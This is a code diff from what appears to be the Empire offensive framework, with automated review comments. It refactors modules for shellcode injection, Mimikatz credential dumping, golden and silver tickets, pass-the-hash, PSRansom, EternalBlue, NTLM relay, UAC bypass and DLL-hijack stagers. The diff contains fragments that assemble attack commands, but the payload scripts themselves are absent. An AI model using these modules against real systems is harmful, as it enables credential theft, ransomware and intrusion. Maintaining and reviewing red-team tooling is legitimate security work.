diff --git a/empire/server/modules/powershell/code_execution/invoke_ntsd.py b/empire/server/modules/powershell/code_execution/invoke_ntsd.py index 269ebfad2..17f3d2c71 100644 --- a/empire/server/modules/powershell/code_execution/invoke_ntsd.py +++ b/empire/server/modules/powershell/code_execution/invoke_ntsd.py @@ -1,16 +1,20 @@ from empire.server.common.empire import MainMenu from empire.server.core.module_models import EmpireModule -from empire.server.utils.module_util import handle_error_message +from empire.server.core.exceptions import ModuleValidationException +from empire.server.core.module_service import auto_finalize, auto_get_source class Module: @staticmethod + @auto_get_source + @auto_finalize def generate( main_menu: MainMenu, module: EmpireModule, params: dict, obfuscate: bool = False, obfuscation_command: str = "", + script: str = "", ): listener_name = params["Listener"] upload_path = params["UploadPath"].strip() @@ -38,20 +42,10 @@ def generate( + "/data/module_source/code_execution/ntsdexts_x86.dll" ) - # read in the common module source code - script, err = main_menu.modulesv2.get_module_source( - module_name=module.script_path, - obfuscate=obfuscate, - obfuscate_command=obfuscation_command, - ) - - if err: - return handle_error_message(err) - script_end = "" if not main_menu.listenersv2.get_active_listener_by_name(listener_name): # not a valid listener, return nothing for the script - return handle_error_message("[!] Invalid listener: %s" % (listener_name)) + raise ModuleValidationException("Invalid listener: %s" % (listener_name)) else: multi_launcher = main_menu.stagertemplatesv2.new_instance("multi_launcher") multi_launcher.options["Listener"] = params["Listener"] @@ -64,7 +58,7 @@ def generate( launcher = multi_launcher.generate() if launcher == "": - return handle_error_message("[!] Error in launcher generation.") + raise ModuleValidationException("Error in launcher generation.") else: launcher = launcher.split(" ")[-1] 
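Review bot: The first hunk of invoke_ntsd.py changes `generate`'s contract without documenting it: the function gains a `script` parameter defaulting to `""`, and the last hunk of this file makes it return a `(script, script_end)` pair instead of the finished script. A one-line docstring would keep the next module author from calling it undecorated or returning a bare string, for example `"""Return (script, script_end); script is injected by auto_get_source, the pair is consumed by auto_finalize."""`. Both decorators are defined outside this diff, so that wording should be checked against `module_service`. The same gap exists in every other `generate` converted by this commit, and the function body continues outside the hunk.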
@@ -94,10 +88,4 @@ def generate( script_end += "\r\n" script_end += code_exec - script = main_menu.modulesv2.finalize_module( - script=script, - script_end=script_end, - obfuscate=obfuscate, - obfuscation_command=obfuscation_command, - ) - return script + return script, script_end diff --git a/empire/server/modules/powershell/code_execution/invoke_reflectivepeinjection.py b/empire/server/modules/powershell/code_execution/invoke_reflectivepeinjection.py index 6fb27e121..ac76f44e8 100644 --- a/empire/server/modules/powershell/code_execution/invoke_reflectivepeinjection.py +++ b/empire/server/modules/powershell/code_execution/invoke_reflectivepeinjection.py @@ -2,31 +2,29 @@ from empire.server.common import helpers from empire.server.common.empire import MainMenu +from empire.server.core.exceptions import ModuleValidationException from empire.server.core.module_models import EmpireModule -from empire.server.utils.module_util import handle_error_message +from empire.server.core.module_service import auto_finalize, auto_get_source class Module: @staticmethod + @auto_get_source + @auto_finalize def generate( main_menu: MainMenu, module: EmpireModule, params: dict, obfuscate: bool = False, obfuscation_command: str = "", + script: str = "", ): - # read in the common module source code - script, err = main_menu.modulesv2.get_module_source( - module_name=module.script_path, - obfuscate=obfuscate, - obfuscate_command=obfuscation_command, - ) script_end = "\nInvoke-ReflectivePEInjection" # check if file or PEUrl is set. Both are required params in their respective parameter sets. if params["File"] == "" and params["PEUrl"] == "": - return handle_error_message("[!] Please provide a PEUrl or File") + raise ModuleValidationException(("Please provide a PEUrl or File") for option, values in params.items(): if option.lower() != "agent": if option.lower() == "file": 
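Review bot: The added `raise ModuleValidationException(("Please provide a PEUrl or File")` in invoke_reflectivepeinjection.py opens two parentheses and closes only one, so the file will not parse and the module cannot be imported. It should read `raise ModuleValidationException("Please provide a PEUrl or File")`. Because this fails as a SyntaxError at load time rather than at call time, a test that simply imports every module file would catch this class of slip. `generate`'s body continues past the end of the hunk.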
@@ -59,10 +57,4 @@ def generate( elif values and values != "": script_end += " -" + str(option) + " " + str(values) - script = main_menu.modulesv2.finalize_module( - script=script, - script_end=script_end, - obfuscate=obfuscate, - obfuscation_command=obfuscation_command, - ) - return script + return script, script_end diff --git a/empire/server/modules/powershell/code_execution/invoke_shellcode.py b/empire/server/modules/powershell/code_execution/invoke_shellcode.py index fc2c7cb14..51630d5e1 100644 --- a/empire/server/modules/powershell/code_execution/invoke_shellcode.py +++ b/empire/server/modules/powershell/code_execution/invoke_shellcode.py @@ -2,23 +2,21 @@ from empire.server.common.empire import MainMenu from empire.server.core.module_models import EmpireModule +from empire.server.core.module_service import auto_finalize, auto_get_source class Module: @staticmethod + @auto_get_source + @auto_finalize def generate( main_menu: MainMenu, module: EmpireModule, params: dict, obfuscate: bool = False, obfuscation_command: str = "", + script: str = "", ): - # read in the common module source code - script, err = main_menu.modulesv2.get_module_source( - module_name=module.script_path, - obfuscate=obfuscate, - obfuscate_command=obfuscation_command, - ) script_end = "\nInvoke-Shellcode -Force" @@ -42,10 +40,4 @@ def generate( script_end += "; 'Shellcode injected.'" - script = main_menu.modulesv2.finalize_module( - script=script, - script_end=script_end, - obfuscate=obfuscate, - obfuscation_command=obfuscation_command, - ) - return script + return script, script_end diff --git a/empire/server/modules/powershell/code_execution/invoke_shellcodemsil.py b/empire/server/modules/powershell/code_execution/invoke_shellcodemsil.py index 17fdd94da..dbc18a0c1 100644 --- a/empire/server/modules/powershell/code_execution/invoke_shellcodemsil.py +++ b/empire/server/modules/powershell/code_execution/invoke_shellcodemsil.py 
@@ -1,26 +1,19 @@ from empire.server.common.empire import MainMenu from empire.server.core.module_models import EmpireModule -from empire.server.utils.module_util import handle_error_message - +from empire.server.core.module_service import auto_finalize, auto_get_source class Module: @staticmethod + @auto_get_source + @auto_finalize def generate( main_menu: MainMenu, module: EmpireModule, params: dict, obfuscate: bool = False, obfuscation_command: str = "", + script: str = "", ): - # read in the common module source code - script, err = main_menu.modulesv2.get_module_source( - module_name=module.script_path, - obfuscate=obfuscate, - obfuscate_command=obfuscation_command, - ) - - if err: - return handle_error_message(err) script_end = "Invoke-ShellcodeMSIL" @@ -35,10 +28,4 @@ def generate( sc = ",0".join(values.split("\\"))[1:] script_end += " -" + str(option) + " @(" + sc + ")" - script = main_menu.modulesv2.finalize_module( - script=script, - script_end=script_end, - obfuscate=obfuscate, - obfuscation_command=obfuscation_command, - ) - return script + return script, script_end diff --git a/empire/server/modules/powershell/collection/screenshot.py b/empire/server/modules/powershell/collection/screenshot.py index 646b880bb..0b72d950e 100644 --- a/empire/server/modules/powershell/collection/screenshot.py +++ b/empire/server/modules/powershell/collection/screenshot.py 
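Review bot: The import block in invoke_shellcodemsil.py loses one of the blank lines before `class Module:`, because the hunk removes the `handle_error_message` import and the empty line after it but adds only the new import. That likely leaves a single blank line before the class where PEP 8 (E302) expects two; re-add the empty line after `from empire.server.core.module_service import auto_finalize, auto_get_source`. The same pattern appears in the first hunks of dcsync_hashdump.py, lsadump.py, mimitokens.py, silver_ticket.py and PSRansom.py. Running the project formatter over the touched files would settle all of them.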
@@ -1,26 +1,20 @@ from empire.server.common.empire import MainMenu from empire.server.core.module_models import EmpireModule -from empire.server.utils.module_util import handle_error_message +from empire.server.core.module_service import auto_finalize, auto_get_source class Module: @staticmethod + @auto_get_source + @auto_finalize def generate( main_menu: MainMenu, module: EmpireModule, params: dict, obfuscate: bool = False, obfuscation_command: str = "", + script: str = "", ): - # read in the common module source code - script, err = main_menu.modulesv2.get_module_source( - module_name=module.script_path, - obfuscate=obfuscate, - obfuscate_command=obfuscation_command, - ) - - if err: - return handle_error_message(err) if params["Ratio"]: if params["Ratio"] != "0": @@ -40,10 +34,4 @@ def generate( else: script_end += " -" + str(option) + " " + str(values) - script = main_menu.modulesv2.finalize_module( - script=script, - script_end=script_end, - obfuscate=obfuscate, - obfuscation_command=obfuscation_command, - ) - return script + return script, script_end diff --git a/empire/server/modules/powershell/credentials/mimikatz/dcsync_hashdump.py b/empire/server/modules/powershell/credentials/mimikatz/dcsync_hashdump.py index b3bc8bd0e..0d938bde6 100644 --- a/empire/server/modules/powershell/credentials/mimikatz/dcsync_hashdump.py +++ b/empire/server/modules/powershell/credentials/mimikatz/dcsync_hashdump.py 
@@ -1,26 +1,19 @@ from empire.server.common.empire import MainMenu from empire.server.core.module_models import EmpireModule -from empire.server.utils.module_util import handle_error_message - +from empire.server.core.module_service import auto_finalize, auto_get_source class Module: @staticmethod + @auto_get_source + @auto_finalize def generate( main_menu: MainMenu, module: EmpireModule, params: dict, obfuscate: bool = False, obfuscation_command: str = "", + script: str = "", ): - # read in the common module source code - script, err = main_menu.modulesv2.get_module_source( - module_name=module.script_path, - obfuscate=obfuscate, - obfuscate_command=obfuscation_command, - ) - - if err: - return handle_error_message(err) script_end = "Invoke-DCSync -PWDumpFormat " @@ -39,10 +32,4 @@ def generate( outputf = params.get("OutputFunction", "Out-String") script_end += f" | {outputf};" - script = main_menu.modulesv2.finalize_module( - script=script, - script_end=script_end, - obfuscate=obfuscate, - obfuscation_command=obfuscation_command, - ) - return script + return script, script_end diff --git a/empire/server/modules/powershell/credentials/mimikatz/golden_ticket.py b/empire/server/modules/powershell/credentials/mimikatz/golden_ticket.py index 83a166849..bf1fdd43c 100644 --- a/empire/server/modules/powershell/credentials/mimikatz/golden_ticket.py +++ b/empire/server/modules/powershell/credentials/mimikatz/golden_ticket.py 
@@ -2,30 +2,25 @@ from empire.server.common.empire import MainMenu from empire.server.core.db.base import SessionLocal +from empire.server.core.exceptions import ModuleValidationException from empire.server.core.module_models import EmpireModule -from empire.server.utils.module_util import handle_error_message +from empire.server.core.module_service import auto_finalize, auto_get_source log = logging.getLogger(__name__) class Module: @staticmethod + @auto_get_source + @auto_finalize def generate( main_menu: MainMenu, module: EmpireModule, params: dict, obfuscate: bool = False, obfuscation_command: str = "", + script: str = "", ): - # read in the common module source code - script, err = main_menu.modulesv2.get_module_source( - module_name=module.script_path, - obfuscate=obfuscate, - obfuscate_command=obfuscation_command, - ) - - if err: - return handle_error_message(err) # if a credential ID is specified, try to parse cred_id = params["CredID"] @@ -34,10 +29,10 @@ def generate( cred = main_menu.credentialsv2.get_by_id(db, cred_id) if not cred: - return handle_error_message("[!] CredID is invalid!") + raise ModuleValidationException("CredID is invalid!") if cred.username != "krbtgt": - return handle_error_message("[!] A krbtgt account must be used") + raise ModuleValidationException("A krbtgt account must be used") if cred.domain != "": params["domain"] = cred.domain @@ -63,10 +58,4 @@ def generate( script_end += " /ptt\"'" - script = main_menu.modulesv2.finalize_module( - script=script, - script_end=script_end, - obfuscate=obfuscate, - obfuscation_command=obfuscation_command, - ) - return script + return script, script_end diff --git a/empire/server/modules/powershell/credentials/mimikatz/lsadump.py b/empire/server/modules/powershell/credentials/mimikatz/lsadump.py index 1eb2d4365..b503f09a0 100644 --- a/empire/server/modules/powershell/credentials/mimikatz/lsadump.py +++ b/empire/server/modules/powershell/credentials/mimikatz/lsadump.py 
@@ -1,26 +1,19 @@ from empire.server.common.empire import MainMenu from empire.server.core.module_models import EmpireModule -from empire.server.utils.module_util import handle_error_message - +from empire.server.core.module_service import auto_finalize, auto_get_source class Module: @staticmethod + @auto_get_source + @auto_finalize def generate( main_menu: MainMenu, module: EmpireModule, params: dict, obfuscate: bool = False, obfuscation_command: str = "", + script: str = "", ): - # read in the common module source code - script, err = main_menu.modulesv2.get_module_source( - module_name=module.script_path, - obfuscate=obfuscate, - obfuscate_command=obfuscation_command, - ) - - if err: - return handle_error_message(err) script_end = "Invoke-Mimikatz -Command " @@ -31,10 +24,4 @@ def generate( script_end += "\"';" - script = main_menu.modulesv2.finalize_module( - script=script, - script_end=script_end, - obfuscate=obfuscate, - obfuscation_command=obfuscation_command, - ) - return script + return script, script_end diff --git a/empire/server/modules/powershell/credentials/mimikatz/mimitokens.py b/empire/server/modules/powershell/credentials/mimikatz/mimitokens.py index 01bbd01f2..ce8ded6f1 100644 --- a/empire/server/modules/powershell/credentials/mimikatz/mimitokens.py +++ b/empire/server/modules/powershell/credentials/mimikatz/mimitokens.py 
@@ -1,26 +1,20 @@ from empire.server.common.empire import MainMenu +from empire.server.core.exceptions import ModuleValidationException from empire.server.core.module_models import EmpireModule -from empire.server.utils.module_util import handle_error_message - +from empire.server.core.module_service import auto_finalize, auto_get_source class Module: @staticmethod + @auto_get_source + @auto_finalize def generate( main_menu: MainMenu, module: EmpireModule, params: dict, obfuscate: bool = False, obfuscation_command: str = "", + script: str = "", ): - # read in the common module source code - script, err = main_menu.modulesv2.get_module_source( - module_name=module.script_path, - obfuscate=obfuscate, - obfuscate_command=obfuscation_command, - ) - - if err: - return handle_error_message(err) list_tokens = params["list"] elevate = params["elevate"] @@ -40,8 +34,8 @@ def generate( elif elevate.lower() == "true": script_end += "'\"token::elevate" else: - return handle_error_message( - "[!] list, elevate, or revert must be specified!" + raise ModuleValidationException( + "list, elevate, or revert must be specified!" ) if domainadmin.lower() == "true": @@ -55,10 +49,4 @@ def generate( script_end += "\"';" - script = main_menu.modulesv2.finalize_module( - script=script, - script_end=script_end, - obfuscate=obfuscate, - obfuscation_command=obfuscation_command, - ) - return script + return script, script_end diff --git a/empire/server/modules/powershell/credentials/mimikatz/pth.py b/empire/server/modules/powershell/credentials/mimikatz/pth.py index d7fda4c25..10e36ef3e 100644 --- a/empire/server/modules/powershell/credentials/mimikatz/pth.py +++ b/empire/server/modules/powershell/credentials/mimikatz/pth.py 
@@ -2,30 +2,25 @@ from empire.server.common.empire import MainMenu from empire.server.core.db.base import SessionLocal +from empire.server.core.exceptions import ModuleValidationException from empire.server.core.module_models import EmpireModule -from empire.server.utils.module_util import handle_error_message +from empire.server.core.module_service import auto_finalize, auto_get_source log = logging.getLogger(__name__) class Module: @staticmethod + @auto_get_source + @auto_finalize def generate( main_menu: MainMenu, module: EmpireModule, params: dict, obfuscate: bool = False, obfuscation_command: str = "", + script: str = "", ): - # read in the common module source code - script, err = main_menu.modulesv2.get_module_source( - module_name=module.script_path, - obfuscate=obfuscate, - obfuscate_command=obfuscation_command, - ) - - if err: - return handle_error_message(err) # if a credential ID is specified, try to parse cred_id = params["CredID"] @@ -34,10 +29,10 @@ def generate( cred = main_menu.credentialsv2.get_by_id(db, cred_id) if not cred: - return handle_error_message("[!] CredID is invalid!") + raise ModuleValidationException("CredID is invalid!") if cred.credtype != "hash": - return handle_error_message("[!] An NTLM hash must be used!") + raise ModuleValidationException("An NTLM hash must be used!") if cred.username != "": params["user"] = cred.username @@ -61,10 +56,4 @@ def generate( ';"`nUse credentials/token to steal the token of the created PID."' ) - script = main_menu.modulesv2.finalize_module( - script=script, - script_end=script_end, - obfuscate=obfuscate, - obfuscation_command=obfuscation_command, - ) - return script + return script, script_end diff --git a/empire/server/modules/powershell/credentials/mimikatz/silver_ticket.py b/empire/server/modules/powershell/credentials/mimikatz/silver_ticket.py index 7d9250ab8..c333b2529 100644 --- a/empire/server/modules/powershell/credentials/mimikatz/silver_ticket.py 
+++ b/empire/server/modules/powershell/credentials/mimikatz/silver_ticket.py @@ -1,28 +1,22 @@ from empire.server.common import helpers from empire.server.common.empire import MainMenu from empire.server.core.db.base import SessionLocal +from empire.server.core.exceptions import ModuleValidationException from empire.server.core.module_models import EmpireModule -from empire.server.utils.module_util import handle_error_message - +from empire.server.core.module_service import auto_finalize, auto_get_source class Module: @staticmethod + @auto_get_source + @auto_finalize def generate( main_menu: MainMenu, module: EmpireModule, params: dict, obfuscate: bool = False, obfuscation_command: str = "", + script: str = "", ): - # read in the common module source code - script, err = main_menu.modulesv2.get_module_source( - module_name=module.script_path, - obfuscate=obfuscate, - obfuscate_command=obfuscation_command, - ) - - if err: - return handle_error_message(err) # if a credential ID is specified, try to parse cred_id = params["CredID"] @@ -31,10 +25,10 @@ def generate( cred = main_menu.credentialsv2.get_by_id(db, cred_id) if not cred: - return handle_error_message("[!] CredID is invalid!") + raise ModuleValidationException("CredID is invalid!") if not cred.username.endswith("$"): - return handle_error_message( + raise ModuleValidationException( "[!] please specify a machine account credential" ) if cred.domain != "": 
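Review bot: The machine-account check in silver_ticket.py still raises with the old console prefix, `"[!] please specify a machine account credential"`. Every other message converted in this commit drops `[!] `, so this one will render differently wherever the ModuleValidationException text is shown. Change it to `raise ModuleValidationException("please specify a machine account credential")`. The enclosing `generate` starts and ends outside this hunk.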
@@ -48,13 +42,13 @@ def generate( # error checking if not helpers.validate_ntlm(params["rc4"]): - return handle_error_message("[!] rc4/NTLM hash not specified") + raise ModuleValidationException("rc4/NTLM hash not specified") if params["target"] == "": - return handle_error_message("[!] target not specified") + raise ModuleValidationException("target not specified") if params["sid"] == "": - return handle_error_message("[!] domain SID not specified") + raise ModuleValidationException("domain SID not specified") # build the golden ticket command script_end = "Invoke-Mimikatz -Command '\"kerberos::golden" @@ -70,10 +64,4 @@ def generate( script_end += " /ptt\"'" - script = main_menu.modulesv2.finalize_module( - script=script, - script_end=script_end, - obfuscate=obfuscate, - obfuscation_command=obfuscation_command, - ) - return script + return script, script_end diff --git a/empire/server/modules/powershell/credentials/mimikatz/trust_keys.py b/empire/server/modules/powershell/credentials/mimikatz/trust_keys.py index a94c47fff..d1e8077e2 100644 --- a/empire/server/modules/powershell/credentials/mimikatz/trust_keys.py +++ b/empire/server/modules/powershell/credentials/mimikatz/trust_keys.py @@ -1,26 +1,20 @@ from empire.server.common.empire import MainMenu from empire.server.core.module_models import EmpireModule -from empire.server.utils.module_util import handle_error_message +from empire.server.core.module_service import auto_finalize, auto_get_source class Module: @staticmethod + @auto_get_source + @auto_finalize def generate( main_menu: MainMenu, module: EmpireModule, params: dict, obfuscate: bool = False, obfuscation_command: str = "", + script: str = "", ): - # read in the common module source code - script, err = main_menu.modulesv2.get_module_source( - module_name=module.script_path, - obfuscate=obfuscate, - obfuscate_command=obfuscation_command, - ) - - if err: - return handle_error_message(err) script_end = "" if params["Method"].lower() == "sekurlsa": 
@@ -28,10 +22,4 @@ def generate( else: script_end += "Invoke-Mimikatz -Command '\"lsadump::trust /patch\"'" - script = main_menu.modulesv2.finalize_module( - script=script, - script_end=script_end, - obfuscate=obfuscate, - obfuscation_command=obfuscation_command, - ) - return script + return script, script_end diff --git a/empire/server/modules/powershell/credentials/tokens.py b/empire/server/modules/powershell/credentials/tokens.py index 8e61487d2..381bf7cdf 100644 --- a/empire/server/modules/powershell/credentials/tokens.py +++ b/empire/server/modules/powershell/credentials/tokens.py @@ -1,26 +1,20 @@ from empire.server.common.empire import MainMenu from empire.server.core.module_models import EmpireModule -from empire.server.utils.module_util import handle_error_message +from empire.server.core.module_service import auto_finalize, auto_get_source class Module: @staticmethod + @auto_get_source + @auto_finalize def generate( main_menu: MainMenu, module: EmpireModule, params: dict, obfuscate: bool = False, obfuscation_command: str = "", + script: str = "", ): - # read in the common module source code - script, err = main_menu.modulesv2.get_module_source( - module_name=module.script_path, - obfuscate=obfuscate, - obfuscate_command=obfuscation_command, - ) - - if err: - return handle_error_message(err) script_end = "Invoke-TokenManipulation" @@ -73,10 +67,4 @@ def generate( if params["RevToSelf"].lower() != "true": script_end += ';"`nUse credentials/tokens with RevToSelf option to revert token privileges"' - script = main_menu.modulesv2.finalize_module( - script=script, - script_end=script_end, - obfuscate=obfuscate, - obfuscation_command=obfuscation_command, - ) - return script + return script, script_end diff --git a/empire/server/modules/powershell/exfiltration/PSRansom.py b/empire/server/modules/powershell/exfiltration/PSRansom.py index 16fd0cbc0..31f83f96d 100644 --- a/empire/server/modules/powershell/exfiltration/PSRansom.py 
+++ b/empire/server/modules/powershell/exfiltration/PSRansom.py @@ -1,26 +1,19 @@ from empire.server.common.empire import MainMenu from empire.server.core.module_models import EmpireModule -from empire.server.utils.module_util import handle_error_message - +from empire.server.core.module_service import auto_finalize, auto_get_source class Module: @staticmethod + @auto_get_source + @auto_finalize def generate( main_menu: MainMenu, module: EmpireModule, params: dict, obfuscate: bool = False, obfuscation_command: str = "", + script: str = "", ): - # read in the common module source code - script, err = main_menu.modulesv2.get_module_source( - module_name=module.script_path, - obfuscate=obfuscate, - obfuscate_command=obfuscation_command, - ) - - if err: - return handle_error_message(err) if params["Mode"] == "Encrypt": args = f'$args = @(\'-e\', \'{params["Directory"]}\'' @@ -43,10 +36,5 @@ def generate( args += ")\n" script = args + script - script = main_menu.modulesv2.finalize_module( - script=script, - script_end="", - obfuscate=obfuscate, - obfuscation_command=obfuscation_command, - ) + return script diff --git a/empire/server/modules/powershell/exploitation/exploit_eternalblue.py b/empire/server/modules/powershell/exploitation/exploit_eternalblue.py index ddefe0337..1de063d5a 100755 --- a/empire/server/modules/powershell/exploitation/exploit_eternalblue.py +++ b/empire/server/modules/powershell/exploitation/exploit_eternalblue.py 
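Review bot: In PSRansom.py `generate` is now wrapped in `@auto_finalize`, yet the last hunk still ends with `return script`, a single string, while every other module in this commit that uses the decorator returns `script, script_end`. `auto_finalize` is defined outside this diff, but if it unpacks a pair, this module will fail at generation time or be finalized incorrectly. Since the args prefix is already prepended to `script` here, `return script, ""` preserves the previous `script_end=""` behaviour. The hunk also leaves a stray blank line above the return.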
@@ -1,26 +1,20 @@ from empire.server.common.empire import MainMenu from empire.server.core.module_models import EmpireModule -from empire.server.utils.module_util import handle_error_message +from empire.server.core.module_service import auto_finalize, auto_get_source class Module: @staticmethod + @auto_get_source + @auto_finalize def generate( main_menu: MainMenu, module: EmpireModule, params: dict, obfuscate: bool = False, obfuscation_command: str = "", + script: str = "", ): - # read in the common module source code - script, err = main_menu.modulesv2.get_module_source( - module_name=module.script_path, - obfuscate=obfuscate, - obfuscate_command=obfuscation_command, - ) - - if err: - return handle_error_message(err) script_end = "\nInvoke-EternalBlue " @@ -34,10 +28,4 @@ def generate( script_end += "; 'Exploit complete'" - script = main_menu.modulesv2.finalize_module( - script=script, - script_end=script_end, - obfuscate=obfuscate, - obfuscation_command=obfuscation_command, - ) - return script + return script, script_end diff --git a/empire/server/modules/powershell/lateral_movement/inveigh_relay.py b/empire/server/modules/powershell/lateral_movement/inveigh_relay.py index 51e668d88..354653843 100644 --- a/empire/server/modules/powershell/lateral_movement/inveigh_relay.py +++ b/empire/server/modules/powershell/lateral_movement/inveigh_relay.py @@ -1,16 +1,20 @@ from empire.server.common.empire import MainMenu +from empire.server.core.exceptions import ModuleValidationException from empire.server.core.module_models import EmpireModule -from empire.server.utils.module_util import handle_error_message +from empire.server.core.module_service import auto_finalize, auto_get_source class Module: @staticmethod + @auto_get_source + @auto_finalize def generate( main_menu: MainMenu, module: EmpireModule, params: dict, obfuscate: bool = False, obfuscation_command: str = "", + script: str = "", ): # staging options listener_name = params["Listener"] 
@@ -21,20 +25,10 @@ def generate( launcher_obfuscate = params["Obfuscate"].lower() == "true" launcher_obfuscate_command = params["ObfuscateCommand"] - # read in the common module source code - script, err = main_menu.modulesv2.get_module_source( - module_name=module.script_path, - obfuscate=obfuscate, - obfuscate_command=obfuscation_command, - ) - - if err: - return handle_error_message(err) - if command == "": if not main_menu.listenersv2.get_active_listener_by_name(listener_name): # not a valid listener, return nothing for the script - return handle_error_message("[!] Invalid listener: " + listener_name) + raise ModuleValidationException("Invalid listener: " + listener_name) else: # generate the PowerShell one-liner with all of the proper options set @@ -52,7 +46,7 @@ def generate( # check if launcher errored out. If so return nothing if command == "": - return handle_error_message("[!] Error in launcher generation.") + raise ModuleValidationException("Error in launcher generation.") # set defaults for Empire script_end = "\n" + 'Invoke-InveighRelay -Tool "2" -Command \\"%s\\"' % ( @@ -82,10 +76,4 @@ def generate( else: script_end += " -" + str(option) + ' "' + str(values) + '"' - script = main_menu.modulesv2.finalize_module( - script=script, - script_end=script_end, - obfuscate=obfuscate, - obfuscation_command=obfuscation_command, - ) - return script + return script, script_end diff --git a/empire/server/modules/powershell/privesc/bypassuac_tokenmanipulation.py b/empire/server/modules/powershell/privesc/bypassuac_tokenmanipulation.py index 1a0d50dd8..1375ed760 100644 --- a/empire/server/modules/powershell/privesc/bypassuac_tokenmanipulation.py +++ b/empire/server/modules/powershell/privesc/bypassuac_tokenmanipulation.py 
@@ -3,33 +3,26 @@ from empire.server.common.empire import MainMenu from empire.server.core.module_models import EmpireModule -from empire.server.utils.module_util import handle_error_message +from empire.server.core.module_service import auto_finalize, auto_get_source class Module: @staticmethod + @auto_get_source + @auto_finalize def generate( main_menu: MainMenu, module: EmpireModule, params: dict, obfuscate: bool = False, obfuscation_command: str = "", + script: str = "", ): # options stager = params["Stager"] host = params["Host"] port = params["Port"] - # read in the common module source code - script, err = main_menu.modulesv2.get_module_source( - module_name=module.script_path, - obfuscate=obfuscate, - obfuscate_command=obfuscation_command, - ) - - if err: - return handle_error_message(err) - try: blank_command = "" powershell_command = "" @@ -56,10 +49,4 @@ def generate( encoded_cradle ) - script = main_menu.modulesv2.finalize_module( - script=script, - script_end=script_end, - obfuscate=obfuscate, - obfuscation_command=obfuscation_command, - ) - return script + return script, script_end diff --git a/empire/server/modules/powershell/privesc/ms16-135.py b/empire/server/modules/powershell/privesc/ms16-135.py index 4ecb32746..865313640 100644 --- a/empire/server/modules/powershell/privesc/ms16-135.py +++ b/empire/server/modules/powershell/privesc/ms16-135.py 
@@ -1,26 +1,20 @@ from empire.server.common.empire import MainMenu from empire.server.core.module_models import EmpireModule -from empire.server.utils.module_util import handle_error_message +from empire.server.core.module_service import auto_finalize, auto_get_source class Module: @staticmethod + @auto_get_source + @auto_finalize def generate( main_menu: MainMenu, module: EmpireModule, params: dict, obfuscate: bool = False, obfuscation_command: str = "", + script: str = "", ): - # read in the common module source code - script, err = main_menu.modulesv2.get_module_source( - module_name=module.script_path, - obfuscate=obfuscate, - obfuscate_command=obfuscation_command, - ) - - if err: - return handle_error_message(err) # generate the launcher code without base64 encoding listener_name = params["Listener"] @@ -43,10 +37,4 @@ def generate( script_end = 'Invoke-MS16135 -Command "' + launcher_code + '"' script_end += ';"`nInvoke-MS16135 completed."' - script = main_menu.modulesv2.finalize_module( - script=script, - script_end=script_end, - obfuscate=obfuscate, - obfuscation_command=obfuscation_command, - ) - return script + return script, script_end diff --git a/empire/server/modules/powershell/privesc/powerup/service_exe_stager.py b/empire/server/modules/powershell/privesc/powerup/service_exe_stager.py index 898a9d20c..cf5523428 100644 --- a/empire/server/modules/powershell/privesc/powerup/service_exe_stager.py +++ b/empire/server/modules/powershell/privesc/powerup/service_exe_stager.py 
@@ -1,26 +1,21 @@ from empire.server.common.empire import MainMenu +from empire.server.core.exceptions import ModuleValidationException from empire.server.core.module_models import EmpireModule -from empire.server.utils.module_util import handle_error_message +from empire.server.core.module_service import auto_finalize, auto_get_source class Module: @staticmethod + @auto_get_source + @auto_finalize def generate( main_menu: MainMenu, module: EmpireModule, params: dict, obfuscate: bool = False, obfuscation_command: str = "", + script: str = "", ): - # read in the common module source code - script, err = main_menu.modulesv2.get_module_source( - module_name=module.script_path, - obfuscate=obfuscate, - obfuscate_command=obfuscation_command, - ) - - if err: - return handle_error_message(err) service_name = params["ServiceName"] @@ -50,7 +45,7 @@ def generate( script_end += '"Launcher bat written to $tempLoc `n";\n' if launcher_code == "": - return handle_error_message("[!] Error in launcher .bat generation.") + raise ModuleValidationException("Error in launcher .bat generation.") else: script_end += ( '\nInstall-ServiceBinary -ServiceName "' @@ -58,10 +53,4 @@ def generate( + '" -Command "C:\\Windows\\System32\\cmd.exe /C $tempLoc"' ) - script = main_menu.modulesv2.finalize_module( - script=script, - script_end=script_end, - obfuscate=obfuscate, - obfuscation_command=obfuscation_command, - ) - return script + return script, script_end diff --git a/empire/server/modules/powershell/privesc/powerup/write_dllhijacker.py b/empire/server/modules/powershell/privesc/powerup/write_dllhijacker.py index 6ab666931..ee45a4558 100644 --- a/empire/server/modules/powershell/privesc/powerup/write_dllhijacker.py +++ b/empire/server/modules/powershell/privesc/powerup/write_dllhijacker.py 
@@ -1,16 +1,20 @@ from empire.server.common.empire import MainMenu +from empire.server.core.exceptions import ModuleValidationException from empire.server.core.module_models import EmpireModule -from empire.server.utils.module_util import handle_error_message +from empire.server.core.module_service import auto_finalize, auto_get_source class Module: @staticmethod + @auto_get_source + @auto_finalize def generate( main_menu: MainMenu, module: EmpireModule, params: dict, obfuscate: bool = False, obfuscation_command: str = "", + script: str = "", ): # staging options launcher_obfuscate = params["Obfuscate"].lower() == "true" @@ -18,16 +22,6 @@ def generate( module_name = "Write-HijackDll" - # read in the common module source code - script, err = main_menu.modulesv2.get_module_source( - module_name=module.script_path, - obfuscate=obfuscate, - obfuscate_command=obfuscation_command, - ) - - if err: - return handle_error_message(err) - script_end = ";" + module_name + " " # extract all of our options @@ -50,7 +44,7 @@ def generate( ) if launcher == "": - return handle_error_message("[!] Error in launcher command generation.") + raise ModuleValidationException("Error in launcher command generation.") else: out_file = params["DllPath"] @@ -58,6 +52,7 @@ def generate( script_end += " -DllPath %s" % (out_file) outputf = params.get("OutputFunction", "Out-String") + script_end += ( f" | {outputf} | " + '%{$_ + "`n"};"`n' @@ -65,10 +60,4 @@ def generate( + ' completed!"' ) - script = main_menu.modulesv2.finalize_module( - script=script, - script_end=script_end, - obfuscate=obfuscate, - obfuscation_command=obfuscation_command, - ) - return script + return script, script_end diff --git a/empire/server/modules/python/privesc/multi/CVE-2021-3560.py b/empire/server/modules/python/privesc/multi/CVE-2021-3560.py index 31d3b462f..bc441400b 100644 --- a/empire/server/modules/python/privesc/multi/CVE-2021-3560.py +++ b/empire/server/modules/python/privesc/multi/CVE-2021-3560.py 
